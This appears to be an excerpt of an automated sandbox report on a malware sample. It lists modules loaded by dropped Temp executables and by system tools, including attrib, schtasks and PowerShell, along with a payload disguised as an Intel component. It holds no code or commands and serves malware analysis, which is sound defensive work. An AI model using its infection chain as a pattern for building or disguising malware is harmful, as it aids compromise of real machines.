Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: file.exe

Static file information: File size 2953216 > 1048576

Source: file.exe

Static PE information: Raw size of kkeyqygg is bigger than: 0x100000 < 0x29f400

Source:	Binary string: wkernel32.pdb source: 4ec75545d6.exe, 00000007.00000003.1719929384.0000000005450000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719840913.0000000005330000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723179047.0000000000D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723273327.0000000005160000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: 4ec75545d6.exe, 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1720451138.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723494227.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: 4ec75545d6.exe, 00000007.00000003.1718937003.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719152846.0000000005520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722506920.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722308783.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
